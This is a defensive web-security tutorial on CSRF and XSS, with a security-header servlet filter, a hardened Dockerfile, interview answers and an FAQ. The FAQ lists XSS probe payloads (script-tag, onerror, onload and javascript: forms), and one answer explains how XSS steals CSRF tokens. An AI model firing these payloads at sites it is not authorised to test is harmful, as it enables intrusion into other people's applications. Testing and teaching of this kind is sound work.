
/**
 * io.thecodeforge: Centralized Security Header Enforcement
 *
 * Applies all required security response headers on every HTTP response.
 * Implemented as a Filter rather than individual controller annotations
 * to guarantee 100% coverage — including error pages, redirects,
 * static resource responses, and any future endpoints.
 *
 * Deploy in shared-security-lib and import as a dependency across services.
 * Do not copy this class into individual service repositories.
 */
@WebFilter(urlPatterns = "/*")  // Intercept every request path
public class SecurityHeaderFilter implements Filter {

    private static final Logger log = LoggerFactory.getLogger(SecurityHeaderFilter.class);

    // CSP value extracted to a constant — change once, applies everywhere
    // Tighten script-src per-service using subclass overrides if needed
    private static final String CSP_POLICY =
        "default-src 'self'; " +
        "script-src 'self'; " +
        "connect-src 'self'; " +
        "object-src 'none'; " +
        "frame-ancestors 'none'";

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        log.info("SecurityHeaderFilter initialized — all responses will carry security headers");
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {

        HttpServletResponse response = (HttpServletResponse) res;

        // Clickjacking protection: prevents your pages from being embedded in iframes
        // frame-ancestors in CSP is the modern equivalent; X-Frame-Options for older browsers
        response.setHeader("X-Frame-Options", "DENY");

        // Prevents browser MIME-type sniffing — a vector for content-type confusion attacks
        response.setHeader("X-Content-Type-Options", "nosniff");

        // Content Security Policy: restricts which sources of scripts, styles,
        // and connections are permitted — browser-enforced XSS mitigation layer
        response.setHeader("Content-Security-Policy", CSP_POLICY);

        // Enforce HTTPS for all future requests from this origin
        // max-age=31536000 = 1 year; includeSubDomains extends to all subdomains
        response.setHeader("Strict-Transport-Security",
            "max-age=31536000; includeSubDomains; preload");

        // Prevents Referer header from leaking your origin URL to third-party resources
        response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin");

        chain.doFilter(req, res);
    }

    @Override
    public void destroy() {
        log.info("SecurityHeaderFilter destroyed");
    }
}
▶ Output
SecurityHeaderFilter initialized — all responses will carry security headers
🔥Why a Centralized Filter Instead of Controller Annotations?
Scattering security headers across individual controllers creates an inevitability problem: some endpoint will be added without them. A new engineer writes an exception handler. A framework generates an error page. A health-check endpoint gets added quickly. None of them get the headers because adding security headers wasn't part of anyone's mental model for that task. A servlet filter runs on every response without exception, including the ones nobody thought to protect. That's the only coverage guarantee that actually holds.
📊 Production Insight
Security headers set in individual controllers are a maintenance liability disguised as a security feature. They work until they don't — until someone adds a new endpoint, modifies an error handler, or upgrades a framework that generates its own responses for certain status codes. I've seen production security scans flag services that had 95% coverage from controller-level header setting, with the missing 5% being 404 pages and exception responses that the WAF wasn't watching.
The Strict-Transport-Security header in the filter above is particularly important: it tells browsers to never make HTTP requests to your domain, only HTTPS — for up to a year after the first visit. Without it, an attacker can intercept the initial HTTP request on an unsecured network and strip the HTTPS redirect before the user's browser has a chance to upgrade. This is the HSTS downgrade attack, and it's still practical on public Wi-Fi.
🎯 Key Takeaway
Centralized enforcement in a filter is the only way to guarantee 100% header coverage. One forgotten endpoint — a 404 handler, an error page, a health check — is all an attacker needs to find an unprotected surface. Filters run on every response. Put security there.

Containerized Security: Deploying Hardened Runtimes

Application-level security — CSRF tokens, output encoding, CSP headers — protects against attacks that reach your application code. Container security protects against what happens when those defenses fail, or when an attacker finds a way in through a dependency vulnerability, a deserialization bug, or an unpatched library.

The principle is blast radius reduction. If an attacker achieves Remote Code Execution (RCE) in your application, what can they do from there? Running as root inside a container means they can read every environment variable, write to the filesystem, install packages, and potentially escape the container if the container runtime has vulnerabilities. Running as a non-root user means they're constrained to what that user can do — which in a minimal Alpine-based image with no package manager and read-only mounts is very little.

The Dockerfile below implements the standard hardened production baseline. It's not exotic — no SELinux profiles, no seccomp filters, no AppArmor policies — just the handful of Dockerfile directives that eliminate the most common container security failures. These are worth doing in every service, not just the ones you're worried about.

Dockerfile · DOCKERFILE
# io.thecodeforge: Hardened Production Container
# Base: node:20-alpine — minimal attack surface (note: the base image still ships npm)
# Pattern: two-stage approach ensures build tools never ship to production

# ---- Stage 1: dependency installation ----
FROM node:20-alpine AS deps

WORKDIR /build

# Copy lock file first — Docker layer cache avoids re-running npm ci
# unless package-lock.json actually changes
COPY package*.json ./

# npm ci: clean install from lock file — deterministic, no version drift
# --omit=dev excludes devDependencies (test runners, build tools) from
#   the final image; it replaces the deprecated --only=production flag
RUN npm ci --omit=dev

# ---- Stage 2: production runtime ----
FROM node:20-alpine

# Run as non-privileged user — node user exists in the official image
# If an attacker achieves RCE, they operate as 'node' with minimal permissions
# They cannot install packages, write to system paths, or modify other users' files
USER node
WORKDIR /home/node/app

# Copy only production node_modules from the deps stage
# devDependencies and build artifacts never reach this stage. Note that
# the node:20-alpine base still includes npm itself; strip it (or use a
# distroless base) if you need a truly package-manager-free runtime
COPY --from=deps --chown=node:node /build/node_modules ./node_modules

# Copy application source
COPY --chown=node:node . .

# Expose only the port the application actually uses
# This does not publish the port — that's done at docker run or in compose
EXPOSE 3000

# Use exec form (array syntax) not shell form ('node server.js')
# Exec form means node is PID 1 and receives SIGTERM directly
# Shell form wraps in /bin/sh -c, which swallows signals and complicates graceful shutdown
CMD ["node", "server.js"]
▶ Output
Successfully built image thecodeforge/hardened-app:latest
⚠ Running as Root in Containers: The Default That Shouldn't Be
The default Docker user is root. This is not a temporary development convenience — it's the production default for any image that doesn't explicitly set USER. If an attacker exploits an RCE vulnerability in your Node.js application, your Express framework, or any of your npm dependencies (and supply chain attacks against npm packages are a documented, recurring threat), they get root access inside the container. From root, privilege escalation paths to the host are not theoretical — they're documented CVEs against container runtimes. Setting USER node is a single line that eliminates the entire class of 'attacker got RCE and now has root' scenarios.
📊 Production Insight
The multi-stage Dockerfile pattern matters beyond just image size. Build tools — compilers, dev dependencies, npm itself in some configurations — represent a significant attack surface if they're present in the production image. An attacker with RCE who finds npm installed can run npm install <malicious-package> to extend their capabilities. An attacker who finds no package manager and a read-only filesystem is constrained to the application's existing capabilities.
Alpine-based images reduce the installed binary surface by roughly 90% compared to a full Debian or Ubuntu base image. There's no curl, no bash (only BusyBox's sh and its minimal applets), no compiler toolchain. That's not just a size optimization — it's removal of the tools that make post-exploitation pivoting significantly easier. The trade-off is occasional compatibility friction with packages that have native bindings requiring glibc instead of musl libc. Verify your dependency tree against Alpine compatibility before committing to it in a production service.
🎯 Key Takeaway
Container security is defense-in-depth for the application security layer — your app can have an exploitable vulnerability, but the blast radius is contained by what the process is permitted to do. Non-root USER is the single most impactful Dockerfile security change. Alpine images reduce the post-exploitation toolkit available to an attacker. Multi-stage builds keep build tools out of the production runtime.
🗂 CSRF vs XSS
Two attack vectors, two trust models, two defense strategies — understanding which trust relationship each attack exploits determines which defenses actually work
Aspect: CSRF (Cross-Site Request Forgery) vs. XSS (Cross-Site Scripting)

What trust relationship the attacker abuses
  • CSRF: The server's trust in the user's browser — the server sees a valid session cookie and assumes the user authorized the request
  • XSS: The user's trust in the website's content — the user's browser sees content delivered from your domain and treats it as legitimate

Where the attack originates
  • CSRF: A separate malicious website that the victim visits while logged into the target site
  • XSS: Code injected into the target website itself — the malicious content is served from your own domain

What the attacker can do
  • CSRF: Trigger authenticated actions on behalf of the victim — transfers, setting changes, data modifications — anything the victim's session is authorized to do
  • XSS: Execute arbitrary JavaScript in the victim's browser with full access to the DOM, cookies (non-HttpOnly), localStorage, and the ability to make authenticated requests

Can the attacker read response data?
  • CSRF: No — same-origin policy blocks the attacker from reading the response. CSRF can only trigger actions, not exfiltrate data directly.
  • XSS: Yes — attacker code runs on your origin, so it has full access to everything on the page, including DOM content, form values, and non-HttpOnly cookies

Can one vulnerability bypass the other's defense?
  • CSRF: Yes — XSS can read CSRF tokens from the DOM, completely bypassing CSRF token protection since the token is visible to same-origin JavaScript
  • XSS: Partially — CSRF does not bypass XSS, but stored XSS can be used to perform CSRF actions from within the victim's browser once the XSS executes

Primary defense
  • CSRF: Synchronizer CSRF tokens embedded in forms, validated server-side on every state-changing request
  • XSS: Output encoding at render time in the correct context (HTML, JS, URL, CSS) — treat user input as data, never as markup

Secondary defense
  • CSRF: SameSite=Strict cookie attribute (browser-enforced) + Origin/Referer header validation as a belt-and-suspenders check
  • XSS: Content Security Policy header — browser-enforced execution restrictions that block injected scripts even if encoding is bypassed

Relative severity
  • CSRF: High — can perform any authenticated action the victim's session is authorized for
  • XSS: Critical — can read data, bypass CSRF, steal session tokens, and persist in stored form to affect all future visitors

🎯 Key Takeaways

  • CSRF exploits the browser's automatic cookie attachment — CSRF tokens are the primary server-side mechanism for verifying that the user actually intended the request, not just that they have a valid session
  • XSS is categorically more dangerous than CSRF because it can read the DOM, exfiltrate tokens, bypass CSRF protection, and in its stored form affects every future visitor without requiring any interaction
  • Output encoding stops XSS injection at the HTML parsing level; CSP stops execution at the browser enforcement level — you need both, because encoding is fallible and CSP catches what slips through
  • HttpOnly, Secure, and SameSite=Strict cookie attributes eliminate entire classes of attacks with minimal implementation cost — treat these as non-negotiable defaults, not optional hardening
  • Never store JWT tokens or CSRF tokens in localStorage — HttpOnly cookies prevent JavaScript access and close the XSS exfiltration path that localStorage leaves wide open
  • Your back-end validation must never trust the client implicitly — assume your front-end is compromised, because if a dependency has an XSS vulnerability, it effectively is
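The cookie attributes named in the takeaways can be produced with nothing but the standard library; the cookie name and value here are placeholders:

```python
from http.cookies import SimpleCookie

def hardened_session_cookie(session_id: str) -> str:
    """Build a Set-Cookie header value with the non-negotiable defaults:
    HttpOnly (no JavaScript access), Secure (HTTPS only),
    SameSite=Strict (never sent on cross-site requests)."""
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    morsel = cookie["sessionid"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    # OutputString() renders just the header value, suitable for
    # response.headers["Set-Cookie"]
    return morsel.OutputString()

header = hardened_session_cookie("opaque-random-id")
print(header)
```

Note that `samesite` support in `http.cookies` requires Python 3.8+; frameworks like Django expose the same attributes through settings instead.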

⚠ Common Mistakes to Avoid

    Relying on SameSite=Lax as the sole CSRF defense
    Symptom

    CSRF attacks succeed via top-level GET navigation. An attacker links to your site from an external page with query parameters that trigger a state change — and because it's a top-level navigation, Lax allows the cookie. Or a confused-deputy attack chains a GET that leaks state into a subsequent forged POST.

    Fix

    Use SameSite=Strict for authentication cookies on high-security applications — it provides stronger protection by blocking the cookie on all cross-site requests without exception. Always implement CSRF tokens as the primary, server-enforced defense, independent of browser-side cookie policy. SameSite is a defense-in-depth layer, not a replacement for tokens.

    HTML-encoding user input at storage time instead of at render time
    Symptom

    Double-encoded output appears in the UI — users see &lt;script&gt; instead of <script> and &amp; instead of &. The stored data is permanently mangled and causes secondary failures when the same data is used in non-HTML contexts: API responses return HTML entities in JSON strings, CSV exports have garbled cell values, email templates render encoded characters as literals.

    Fix

    Store user input raw in the database, exactly as the user provided it. Apply the appropriate output encoding at render time, in the correct context for each output destination. HTML-encode for HTML templates. JSON-encode for JSON responses. URL-encode for query parameters. CSS-encode for CSS values. The encoding function changes depending on where the data is going — storage is never the right encoding context.
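The same raw string passes through a different encoder for each destination; Python's standard library covers three of the four contexts directly:

```python
import html
import json
from urllib.parse import quote

raw = '<script>alert("x")</script>'   # stored exactly as the user sent it

html_ctx = html.escape(raw)           # for HTML templates
json_ctx = json.dumps(raw)            # for JSON API responses
url_ctx  = quote(raw, safe="")        # for query-string parameters

print(html_ctx)  # &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
print(json_ctx)  # "<script>alert(\"x\")</script>"
print(url_ctx)   # %3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E
```

CSS-context escaping has no standard-library helper; in practice it comes from your templating or sanitization library. The point stands regardless: the database holds `raw`, and each output path applies its own encoder.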

    Deploying a CSP header that includes 'unsafe-inline' in script-src
    Symptom

    Security scanner reports 'CSP present' in its header audit, giving a false sense of protection. But unsafe-inline means any inline script — including injected XSS payloads — executes without restriction. The CSP header is providing compliance coverage without providing security.

    Fix

    Remove unsafe-inline from script-src. Move all inline JavaScript to external .js files served from your own origin. For JavaScript that must remain inline — framework initialization code, server-rendered state hydration — use CSP nonces: generate a cryptographically random value per request, include it in the CSP header (script-src 'self' 'nonce-{value}'), and add the matching nonce attribute to each allowed script tag. Injected scripts without the correct nonce are blocked even if unsafe-inline was tempting to add back.
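A per-request nonce can be sketched in a few lines (the helper names are illustrative): the same value must land in both the CSP header and each allowed script tag:

```python
import secrets

def new_request_nonce() -> str:
    """128 bits of entropy, base64url-encoded, fresh on every request."""
    return secrets.token_urlsafe(16)

def csp_header(nonce: str) -> str:
    """CSP value permitting same-origin scripts plus this request's nonce."""
    return f"script-src 'self' 'nonce-{nonce}'; object-src 'none'"

def inline_script(nonce: str, body: str) -> str:
    """Only inline scripts carrying this exact nonce attribute execute."""
    return f'<script nonce="{nonce}">{body}</script>'

nonce = new_request_nonce()
print(csp_header(nonce))
print(inline_script(nonce, "window.__APP_STATE__ = {};"))
```

Generating the nonce once at startup and reusing it would defeat the mechanism; it must be fresh per response, which is why this belongs in per-request middleware.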

    Not rotating session IDs after authentication (session fixation vulnerability)
    Symptom

    An attacker sets a known session ID on the victim's browser — via a crafted link parameter or a cross-subdomain cookie injection — before the victim logs in. The victim authenticates with that known session ID. The attacker, who already knows the session ID, now has an authenticated session without ever knowing the victim's credentials.

    Fix

    Regenerate the session ID on every privilege-level change: after login, after logout, after password change, after role elevation. In Express: call req.session.regenerate() explicitly inside your login handler — it is not called automatically. In Django: login() calls cycle_key() internally, so the default behavior is correct as long as you use the built-in login() function. Never implement your own session management without testing for session fixation.
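The rotation mechanics can be shown with a toy in-memory store (entirely hypothetical; real frameworks do the equivalent via req.session.regenerate() or Django's cycle_key()):

```python
import secrets

class SessionStore:
    """Toy in-memory store demonstrating session-ID rotation at login."""

    def __init__(self):
        self._sessions = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {}
        return sid

    def rotate(self, old_sid: str) -> str:
        """Issue a fresh ID, carry the data over, invalidate the old ID.
        Call on login, logout, password change, role elevation."""
        data = self._sessions.pop(old_sid)  # the old, possibly fixated ID dies here
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

store = SessionStore()
pre_login = store.create()            # possibly attacker-fixated
post_login = store.rotate(pre_login)  # the attacker's known ID no longer works
assert pre_login not in store._sessions and post_login in store._sessions
```

The key property is the `pop`: after rotation, the ID the attacker planted resolves to nothing, so authenticating with it buys them nothing.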

    Using innerHTML or dangerouslySetInnerHTML with user-supplied content without sanitization
    Symptom

    Rich text content, markdown output, or user-formatted display names render correctly in testing (where test content is benign) but become XSS vectors in production when real users submit payloads. The XSS may be DOM-based, making it invisible to server-side log analysis and WAF detection.

    Fix

    Never assign user-supplied content to innerHTML without first running it through DOMPurify.sanitize(). DOMPurify parses the content in a sandboxed context, strips all JavaScript event handlers and dangerous tags, and returns safe HTML. For content that should never contain HTML formatting — usernames, product names, search terms — use element.textContent instead of innerHTML. textContent treats the entire string as literal text, making XSS structurally impossible regardless of what the string contains.

Interview Questions on This Topic

  • Q (Senior): You have CSRF token protection on your transfer endpoint. A security researcher claims your app is still vulnerable to CSRF via XSS. How does that work?
    The researcher is describing a real and important attack chain. CSRF token protection relies on the same-origin policy: the attacker on evil.com can't read your bank.com page, so they can't retrieve the CSRF token embedded there. That guarantee holds only as long as the attacker cannot execute code on your origin. If an XSS vulnerability exists anywhere on bank.com — in a profile field, a comment section, a search result, anywhere — the attacker can inject JavaScript that runs on your origin. From that position, the injected code can do document.querySelector('input[name=_csrf]').value to read the CSRF token directly from the DOM. It can then make a fetch() call to the transfer endpoint with the valid token and the user's session cookie attached automatically. The server sees a valid session, a valid CSRF token, and processes the request. This is why XSS is considered the more critical vulnerability: it can render CSRF protection completely ineffective, steal session tokens from cookies that aren't HttpOnly, read sensitive page content, and persist in stored form to affect every subsequent visitor. The lesson is that XSS and CSRF defenses are not independent — XSS is a CSRF bypass vector, so fixing XSS is also part of CSRF defense.
  • Q (Mid-level): Explain the 'Double Submit Cookie' pattern. Why is it useful for stateless APIs that don't maintain a server-side session?
    Double Submit Cookie is a CSRF defense designed for scenarios where the server has no session state to store a CSRF token against — common in REST APIs using JWT authentication or in horizontally scaled services where sticky sessions aren't available. The pattern works like this: when the client loads the application, the server sets a random token in a cookie (not HttpOnly — it needs to be JavaScript-readable). The client reads that cookie value and includes it in every state-changing request as a custom header — X-CSRF-Token is the conventional name. The server compares the cookie value against the header value. If they match, the request is legitimate. The security guarantee comes from the same-origin policy: an attacker on evil.com cannot read the cookie value from bank.com's domain. They can trigger a request that sends the cookie to bank.com — the browser attaches it automatically — but they cannot set the X-CSRF-Token header to match a value they can't read. The server sees a mismatched pair and rejects the request. The critical limitation: this pattern fails entirely if XSS is present. An XSS payload running on your domain can read the non-HttpOnly cookie with document.cookie, extract the token value, and set the matching header in a forged fetch() request. Double Submit Cookie's security guarantee depends on the attacker being unable to read the cookie value — XSS removes that dependency. For most stateless API scenarios, I'd recommend pairing Double Submit with SameSite=Strict cookies and ensuring XSS prevention is solid before relying on this pattern.
  • Q (Mid-level): Your single-page application uses JWT tokens stored in localStorage for authentication. Does CSRF still apply? What new risk have you introduced?
    CSRF does not apply to JWT-in-localStorage. The reason is specific: browsers do not automatically attach localStorage values to outbound requests. The cookie auto-attachment behavior that makes CSRF possible simply doesn't exist for localStorage. Your JavaScript code must explicitly read the JWT and add it to the Authorization header on each request. An attacker on evil.com can trigger a request to your API, but that request won't carry the JWT — the browser won't add it, and evil.com's JavaScript can't read localStorage across origins. However, you've traded one attack vector for another, and the trade is not favorable. Any JavaScript executing on your domain — including injected XSS payloads — can call localStorage.getItem('jwt') and read the token in plain text. The attacker can then exfiltrate the JWT to their own server and use it to make authenticated API requests directly, from anywhere, without needing to operate within the victim's browser session. With cookies and HttpOnly, the attacker needs to maintain presence in the victim's browser to exploit the session. With localStorage and JWT, they can extract the token once and use it indefinitely (until expiration) from their own infrastructure. HttpOnly cookies prevent this specific attack because document.cookie cannot read HttpOnly cookies. The practical recommendation for most applications: store JWTs in HttpOnly cookies (accepting that you need CSRF tokens as a result), rather than localStorage. The XSS risk from localStorage token exfiltration is harder to fully mitigate than CSRF.
  • Q (Mid-level): Describe the difference between Reflected, Stored, and DOM-based XSS. Which would you prioritize fixing in a forum application?
    Reflected XSS: the payload is embedded in a URL parameter — typically a search term, an error message parameter, or a redirect destination. The server reads the parameter and reflects it in the response without encoding. Only affects users who load that specific crafted URL. Requires social engineering to deliver: the attacker must send the victim a link. Stored XSS: the payload is submitted through a form and persisted to the database — a forum post, a comment, a display name, a profile bio. It's then served to every user who views that content, without requiring any interaction from the victim. A single stored payload in a popular thread can execute for thousands of users over days or weeks before discovery. DOM-based XSS: the injection happens entirely in the client's browser. The malicious string is never sent to the server — it's read from the URL hash, query parameters, postMessage events, or other browser APIs by your own JavaScript, which then writes it unsafely to innerHTML or passes it to eval(). This variant is invisible to server-side WAFs, log analysis, and most SAST tools unless they support JavaScript analysis. In a forum application, I'd prioritize Stored XSS first, without hesitation. The reach and persistence make it categorically more dangerous: one successful injection affects every visitor to that thread automatically, indefinitely, until it's discovered and the payload is removed from the database. Reflected XSS requires per-victim delivery. DOM-based XSS also requires delivery of a crafted URL. Stored XSS operates autonomously once planted.
  • Q: How does the 'nonce' attribute in a Content Security Policy help you safely execute specific inline scripts while blocking all injected ones? (Senior)
    A CSP nonce is a cryptographically random string — typically 128+ bits of entropy encoded as base64 — generated fresh by the server for each HTTP request. The server includes it in two places simultaneously: the CSP response header as 'nonce-{value}' in the script-src directive, and as a nonce attribute on each inline script tag that should be permitted to execute.

    The browser, on receiving the response, checks every inline script tag it encounters. If the script's nonce attribute matches the value in the CSP header, the browser executes it. If the nonce is absent or wrong, the browser blocks execution and (if report-uri is configured) sends a CSP violation report.

    The security guarantee comes from the unpredictability of the nonce. It's generated per-request and never exposed in the page in a way that an XSS payload can read before it would need to use it. An attacker who injects a script tag cannot know the current request's nonce value — it changes with every page load — so their injected script lacks the correct nonce attribute and is blocked.

    This allows you to maintain necessary inline scripts — server-side state hydration for React or Vue, initialization code that references server-rendered configuration — without resorting to 'unsafe-inline', which would allow all inline scripts including injected ones.

    The implementation requirement: nonces must be generated server-side, per request, and injected into both the response header and the HTML template. This means you need server-side rendering or a server-side template layer — you can't generate effective nonces in a purely static HTML file.

Frequently Asked Questions

Can HTTPS alone protect against CSRF and XSS attacks?

No — and this is a common mental-model mistake worth correcting. HTTPS encrypts the connection between the browser and the server, preventing network-level eavesdropping and man-in-the-middle interception of credentials and session tokens. It is essential infrastructure, but it operates at the transport layer.

CSRF and XSS are application-layer attacks. CSRF abuses the session that already exists after a legitimate HTTPS login — the session cookie is valid, the request arrives over HTTPS, and the server has no way to distinguish a legitimate user action from a forged cross-site request without a CSRF token. XSS injects malicious code into the application's own responses — those responses are delivered faithfully over HTTPS, encryption intact, payload included.

HTTPS is a prerequisite, not a substitute. You need it, and you also need CSRF tokens, output encoding, and CSP headers.

If I'm building a REST API that uses JWT in Authorization headers instead of cookies, do I need CSRF protection?

If you are strictly using the Authorization header and storing the JWT in memory (never in cookies or localStorage), CSRF does not apply. The browser will not automatically attach the Authorization header to cross-site requests the way it attaches cookies — your JavaScript code must add it explicitly, and cross-site JavaScript cannot do that.

However, the word 'strictly' is doing a lot of work in that sentence. If any part of your authentication mechanism sets a cookie — even for CSRF token purposes, even for session tracking on a separate login page — you may reintroduce the attack surface. And storing the JWT in localStorage exposes it to XSS exfiltration, which is a different but comparably serious risk.

The practical answer for most REST APIs: if you're using Authorization headers with in-memory token storage, CSRF is not your concern, but XSS prevention becomes more critical because token theft via XSS is the primary authentication attack vector in that architecture.
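The in-memory pattern described above can be sketched as follows. The endpoint, variable, and helper names are illustrative; the essential point is that nothing here is auto-attached by the browser, so a cross-site page cannot forge an authenticated request.

```javascript
// Sketch: token lives only in a module-scoped variable, never in a cookie
// or localStorage. It is lost on page reload, which is the trade-off.
let accessToken = null; // set after login (assumed flow, not shown)

// Build headers explicitly. Cross-site JavaScript cannot call this code,
// and the browser never adds the Authorization header on its own.
function authHeaders(token, extra = {}) {
  return { ...extra, Authorization: `Bearer ${token}` };
}

async function apiFetch(url, options = {}) {
  return fetch(url, {
    ...options,
    headers: authHeaders(accessToken, options.headers),
  });
}
```

The reload trade-off is usually handled with a short-lived access token plus a refresh flow, but the CSRF property holds regardless: no header is sent unless this code runs.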

What's the easiest way to test if my app is vulnerable to XSS right now?

Manual testing is the fastest starting point: submit the string <script>alert(document.domain)</script> into every input field in your application — search boxes, form fields, URL parameters, profile fields, comment boxes. If an alert box appears showing your domain name, you have a reflected or stored XSS vulnerability at that injection point. The document.domain payload confirms you're executing on your origin, not just getting a JavaScript syntax error.

Also test event handler injection for cases where your application filters script tags: try <img src=x onerror=alert(1)>, <svg onload=alert(1)>, and <a href="javascript:alert(1)">click</a>. Many filters block script tags but miss event handler injection.

For a more thorough automated scan, OWASP ZAP (free) and Burp Suite (professional tier) both include XSS scanners that crawl your application and test input fields systematically. These catch cases that manual testing misses, particularly in complex multi-step flows. Run them in a staging environment — aggressive scanning against production can create stored XSS test payloads that reach real users.

What is a 'Nonce' in the context of CSP?

A nonce — short for 'number used once,' though in practice it's a random string used once per request rather than a sequential number — is a cryptographically random value that your server generates fresh for each HTTP response.

You include the nonce in two places simultaneously: the CSP header (script-src 'self' 'nonce-abc123xyz') and the nonce attribute of every inline script tag you want to allow (<script nonce="abc123xyz">...</script>). The browser only executes inline scripts whose nonce attribute matches the value in the CSP header.

Because the nonce changes with every request and attackers cannot predict or retrieve it before their injection executes, injected script tags — which won't have the correct nonce — are blocked by the browser. This lets you maintain necessary inline scripts (server-rendered initialization code, state hydration) while blocking arbitrary injection, without falling back to 'unsafe-inline' which would permit everything.

Should I store CSRF tokens in cookies or server-side sessions?

Server-side sessions are the stronger choice for most applications. When the CSRF token is stored in the session (server-side), it never travels in a cookie that JavaScript can read. The session cookie itself can be HttpOnly, making the token completely inaccessible to any JavaScript — including XSS payloads. The server compares the submitted token against the session-stored value, and the token is only ever visible in the HTML of the page it's embedded in.

Cookie-based CSRF tokens (the Double Submit pattern) are pragmatic for stateless services or APIs that can't maintain server-side session state. They work because an attacker can't read cookies across origins. But they share the XSS vulnerability: if an attacker achieves XSS on your domain, they can read the non-HttpOnly CSRF cookie with document.cookie and forge both sides of the comparison.

The rule I apply: use session-stored CSRF tokens with HttpOnly, Secure, SameSite=Strict session cookies as the default. Use Double Submit only when statelessness is a genuine architectural requirement, and ensure XSS prevention is especially solid in that case since it's the main attack vector against that pattern.

Naren, Founder & Author

Developer and founder of TheCodeForge. I built this site because I was tired of tutorials that explain what to type without explaining why it works. Every article here is written to make concepts actually click.
